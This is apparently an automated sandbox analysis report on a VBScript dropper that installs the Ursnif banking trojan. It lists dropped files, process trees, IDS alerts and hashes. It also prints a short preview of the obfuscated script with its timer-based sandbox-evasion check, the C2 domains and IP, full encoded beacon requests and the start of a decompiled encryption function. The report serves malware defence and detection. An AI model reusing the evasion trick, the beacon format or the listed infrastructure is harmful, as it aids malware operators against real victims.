Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.49.157.6, 20.54.110.249 Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:51:30	API Interceptor	1x Sleep call for process: wscript.exe modified
13:52:04	API Interceptor	3x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.251.90.253	sample.vbs	Get hash	malicious	Browse
	345678.vbs	Get hash	malicious	Browse
	start[526268].vbs	Get hash	malicious	Browse
	URS8.VBS	Get hash	malicious	Browse
	documentation_446618.vbs	Get hash	malicious	Browse
	start_information[754877].vbs	Get hash	malicious	Browse
	start[873316].vbs	Get hash	malicious	Browse
	documentation[979729].vbs	Get hash	malicious	Browse
	run_documentation[820479].vbs	Get hash	malicious	Browse
	run[476167].vbs	Get hash	malicious	Browse
	run_presentation[645872].vbs	Get hash	malicious	Browse
	documentation[979729].vbs	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
atl.bigbigpoppa.com	sample.vbs	Get hash	malicious	Browse	185.251.90.253
	345678.vbs	Get hash	malicious	Browse	185.251.90.253
	start[526268].vbs	Get hash	malicious	Browse	185.251.90.253
	URS8.VBS	Get hash	malicious	Browse	185.251.90.253
	documentation_446618.vbs	Get hash	malicious	Browse	185.251.90.253
	start_information[754877].vbs	Get hash	malicious	Browse	185.251.90.253
	start[873316].vbs	Get hash	malicious	Browse	185.251.90.253
	documentation[979729].vbs	Get hash	malicious	Browse	185.251.90.253
	run_documentation[820479].vbs	Get hash	malicious	Browse	185.251.90.253
	run[476167].vbs	Get hash	malicious	Browse	185.251.90.253
	run_presentation[645872].vbs	Get hash	malicious	Browse	185.251.90.253
	documentation[979729].vbs	Get hash	malicious	Browse	185.251.90.253
pop.urlovedstuff.com	URS8.VBS	Get hash	malicious	Browse	185.251.90.253
pop.urlovedstuff.com	documentation[979729].vbs	Get hash	malicious	Browse	185.251.90.253

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SPRINTHOSTRU	sample.vbs	Get hash	malicious	Browse	185.251.90.253
	345678.vbs	Get hash	malicious	Browse	185.251.90.253
	start[526268].vbs	Get hash	malicious	Browse	185.251.90.253
	ZaRfpqeOYY.apk	Get hash	malicious	Browse	141.8.192.169
	URS8.VBS	Get hash	malicious	Browse	185.251.90.253
	h4AjR43abb.exe	Get hash	malicious	Browse	185.251.88.208
	documentation_446618.vbs	Get hash	malicious	Browse	185.251.90.253
	start_information[754877].vbs	Get hash	malicious	Browse	185.251.90.253
	dAmDdz0YVv.exe	Get hash	malicious	Browse	185.251.88.208
	start[873316].vbs	Get hash	malicious	Browse	185.251.90.253
	documentation[979729].vbs	Get hash	malicious	Browse	185.251.90.253
	run_documentation[820479].vbs	Get hash	malicious	Browse	185.251.90.253
	run[476167].vbs	Get hash	malicious	Browse	185.251.90.253
	run_presentation[645872].vbs	Get hash	malicious	Browse	185.251.90.253
	yXf9mhlpKV.exe	Get hash	malicious	Browse	185.251.88.208
	mgdL2TD6Dg.exe	Get hash	malicious	Browse	185.251.88.208
	documentation[979729].vbs	Get hash	malicious	Browse	185.251.90.253
	Pi2KyLAg44.exe	Get hash	malicious	Browse	185.251.88.208
	oClF50dZRG.exe	Get hash	malicious	Browse	185.251.88.208
	2K5KXrsoLH.exe	Get hash	malicious	Browse	185.251.88.208

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\fum.cpp	sample.vbs	Get hash	malicious	Browse
	345678.vbs	Get hash	malicious	Browse
	start[526268].vbs	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\adobe.url Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\fum.cpp Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	387072
Entropy (8bit):	6.617827225958404
Encrypted:	false
SSDEEP:	6144:kZv2xLg5Ema5+kMLdcW2Ipsk0AOIjlllll/lllllWQO+XK+Mtw:kn5AUkaqIpWylllll/lllll7O+XLMtw
MD5:	D48EBF7B31EDDA518CA13F71E876FFB3
SHA1:	C72880C38C6F1A013AA52D032FC712DC63FE29F1
SHA-256:	8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
SHA-512:	59CBBD4ADA4F51650380989A6A024600BB67982255E9F8FFBED14D3A723471B02DAF53A0A05B2E6664FF35CB4C224F9B209FB476D6709A7B33F0A9C060973FB8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Joe Sandbox View:	Filename: sample.vbs, Detection: malicious, Browse Filename: 345678.vbs, Detection: malicious, Browse Filename: start[526268].vbs, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|...8st.8st.8st....st...9st...#st...+st.8su..st...2st...?st...9st...st...9st...9st.Rich8st.........................PE..L......Y...........!.....,..........9........@......................................%O....@.................................p...d................................%..`...T...............................@............@...............................text....*.......,.................. ..`.rdata...~...@.......0..............@..@.data...............................@....gfids..............................@..@.reloc...%.......&..................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.847598444077791
TrID:
File name:	start[2021.09.09_15-26].vbs
File size:	1393062
MD5:	3959f76d91c30f3c14916f80a6c4cf23
SHA1:	2c918bff7f9073762308af3876777afc8507e3a8
SHA256:	1d02060d7493d25e46e7cdf76fc05aa6c80493f40db75d48700f1eb17431191d
SHA512:	5e74bc0322cbec0d955395f9cb43345bc6d40c2ead457abf5a83a859097327220d7d23d73e8f9a4bbe967a5b73d01a5e522d090f1bcd39cb3f168b4a9a7a14fd
SSDEEP:	12288:SfCepvwq9BTH3FEN9cy59WSpU9lAR4lYtE9E5rf99bh:ipvp9BT1U9cyjUAvmEZbh
File Content Preview:	IHGsfsedgfssd = Timer()..For hjdHJGASDF = 1 to 7..WScript.Sleep 1000:..Next..frjekgJHKasd = Timer()..if frjekgJHKasd - IHGsfsedgfssd < 5 Then..Do: KJHSGDflkjsd = 4: Loop..End if ..const VSE = 208..const Aeq = 94..pgoTH = Array(UGM,DP,wy,2,yt,2,2,2,vy,2,2,

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/10/21-13:52:04.105913	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49789	80	192.168.2.3	185.251.90.253
09/10/21-13:52:04.105913	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49789	80	192.168.2.3	185.251.90.253
09/10/21-13:52:25.037475	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49790	80	192.168.2.3	185.251.90.253
09/10/21-13:52:25.037475	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49790	80	192.168.2.3	185.251.90.253
09/10/21-13:52:46.068609	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49791	80	192.168.2.3	185.251.90.253
09/10/21-13:52:46.068609	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49791	80	192.168.2.3	185.251.90.253

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 10, 2021 13:52:04.054955006 CEST	49789	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:04.104650021 CEST	80	49789	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:04.104789972 CEST	49789	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:04.105912924 CEST	49789	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:04.196993113 CEST	80	49789	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:04.548911095 CEST	80	49789	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:04.548996925 CEST	49789	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:04.549251080 CEST	49789	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:04.600912094 CEST	80	49789	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:24.987175941 CEST	49790	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:25.036384106 CEST	80	49790	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:25.036495924 CEST	49790	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:25.037475109 CEST	49790	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:25.128510952 CEST	80	49790	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:25.510382891 CEST	80	49790	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:25.511292934 CEST	49790	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:25.511434078 CEST	49790	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:25.559459925 CEST	80	49790	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:46.016597986 CEST	49791	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:46.067687988 CEST	80	49791	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:46.067878962 CEST	49791	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:46.068608999 CEST	49791	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:46.161114931 CEST	80	49791	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:46.509069920 CEST	80	49791	185.251.90.253	192.168.2.3
Sep 10, 2021 13:52:46.509210110 CEST	49791	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:46.509423971 CEST	49791	80	192.168.2.3	185.251.90.253
Sep 10, 2021 13:52:46.558790922 CEST	80	49791	185.251.90.253	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 10, 2021 13:49:23.192042112 CEST	50620	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:49:23.222920895 CEST	53	50620	8.8.8.8	192.168.2.3
Sep 10, 2021 13:49:24.919645071 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:49:24.964853048 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 10, 2021 13:49:41.876200914 CEST	60152	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:49:41.917144060 CEST	53	60152	8.8.8.8	192.168.2.3
Sep 10, 2021 13:49:59.155482054 CEST	57544	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:49:59.188512087 CEST	53	57544	8.8.8.8	192.168.2.3
Sep 10, 2021 13:50:01.517759085 CEST	55984	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:50:01.558590889 CEST	53	55984	8.8.8.8	192.168.2.3
Sep 10, 2021 13:50:35.024283886 CEST	64185	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:50:35.064757109 CEST	53	64185	8.8.8.8	192.168.2.3
Sep 10, 2021 13:50:36.346772909 CEST	65110	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:50:36.389978886 CEST	53	65110	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:46.740211964 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:46.790366888 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:49.073030949 CEST	63492	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:49.124716043 CEST	53	63492	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:49.856499910 CEST	60831	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:49.889383078 CEST	53	60831	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:50.329174995 CEST	60100	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:50.376293898 CEST	53	60100	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:50.810614109 CEST	53195	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:50.841372013 CEST	53	53195	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:51.332108974 CEST	50141	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:51.369879961 CEST	53	50141	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:51.977974892 CEST	53023	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:52.004426003 CEST	53	53023	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:52.649060965 CEST	49563	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:52.675614119 CEST	53	49563	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:53.461781979 CEST	51352	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:53.495738983 CEST	53	51352	8.8.8.8	192.168.2.3
Sep 10, 2021 13:51:54.330473900 CEST	59349	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:51:54.379067898 CEST	53	59349	8.8.8.8	192.168.2.3
Sep 10, 2021 13:52:03.637804985 CEST	57084	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:52:04.017317057 CEST	53	57084	8.8.8.8	192.168.2.3
Sep 10, 2021 13:52:24.674542904 CEST	58823	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:52:24.976217031 CEST	53	58823	8.8.8.8	192.168.2.3
Sep 10, 2021 13:52:45.707376957 CEST	57568	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:52:46.013231993 CEST	53	57568	8.8.8.8	192.168.2.3
Sep 10, 2021 13:53:06.561090946 CEST	50540	53	192.168.2.3	8.8.8.8
Sep 10, 2021 13:53:06.865139961 CEST	53	50540	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 10, 2021 13:52:03.637804985 CEST	192.168.2.3	8.8.8.8	0x7952	Standard query (0)	atl.bigbigpoppa.com	A (IP address)	IN (0x0001)
Sep 10, 2021 13:52:24.674542904 CEST	192.168.2.3	8.8.8.8	0xf4a6	Standard query (0)	pop.urlovedstuff.com	A (IP address)	IN (0x0001)
Sep 10, 2021 13:52:45.707376957 CEST	192.168.2.3	8.8.8.8	0xf1f6	Standard query (0)	atl.bigbigpoppa.com	A (IP address)	IN (0x0001)
Sep 10, 2021 13:53:06.561090946 CEST	192.168.2.3	8.8.8.8	0x7fa9	Standard query (0)	pop.urlovedstuff.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 10, 2021 13:52:04.017317057 CEST	8.8.8.8	192.168.2.3	0x7952	No error (0)	atl.bigbigpoppa.com	185.251.90.253	A (IP address)	IN (0x0001)
Sep 10, 2021 13:52:24.976217031 CEST	8.8.8.8	192.168.2.3	0xf4a6	No error (0)	pop.urlovedstuff.com	185.251.90.253	A (IP address)	IN (0x0001)
Sep 10, 2021 13:52:46.013231993 CEST	8.8.8.8	192.168.2.3	0xf1f6	No error (0)	atl.bigbigpoppa.com	185.251.90.253	A (IP address)	IN (0x0001)
Sep 10, 2021 13:53:06.865139961 CEST	8.8.8.8	192.168.2.3	0x7fa9	No error (0)	pop.urlovedstuff.com	185.251.90.253	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

atl.bigbigpoppa.com

pop.urlovedstuff.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49789	185.251.90.253	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Sep 10, 2021 13:52:04.105912924 CEST	5011	OUT	GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: atl.bigbigpoppa.com
Sep 10, 2021 13:52:04.548911095 CEST	5011	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Sep 2021 11:52:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49790	185.251.90.253	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Sep 10, 2021 13:52:25.037475109 CEST	5012	OUT	GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: pop.urlovedstuff.com
Sep 10, 2021 13:52:25.510382891 CEST	5013	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Sep 2021 11:52:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49791	185.251.90.253	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Sep 10, 2021 13:52:46.068608999 CEST	5014	OUT	GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: atl.bigbigpoppa.com
Sep 10, 2021 13:52:46.509069920 CEST	5014	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Sep 2021 11:52:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 3840 Parent PID: 3388

General

Start time:	13:48:57
Start date:	10/09/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
Imagebase:	0x7ff6d0c20000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WmiPrvSE.exe PID: 1304 Parent PID: 792

General

Start time:	13:51:29
Start date:	10/09/2021
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff66d5c0000
File size:	488448 bytes
MD5 hash:	A782A4ED336750D10B3CAF776AFE8E70
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2396 Parent PID: 1304

General

Start time:	13:51:29
Start date:	10/09/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Imagebase:	0x7ff665ad0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5236 Parent PID: 2396

General

Start time:	13:51:30
Start date:	10/09/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Imagebase:	0x1370000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WmiPrvSE.exe PID: 1848 Parent PID: 792

General

Start time:	13:52:02
Start date:	10/09/2021
Path:	C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0xec0000
File size:	426496 bytes
MD5 hash:	7AB59579BA91115872D6E51C54B9133B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 5236 Parent PID: 2396 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	35.1%
Signature Coverage:	11.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	54

Executed Functions

Function 00C23276, Relevance: 18.2, APIs: 12, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00C23276(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
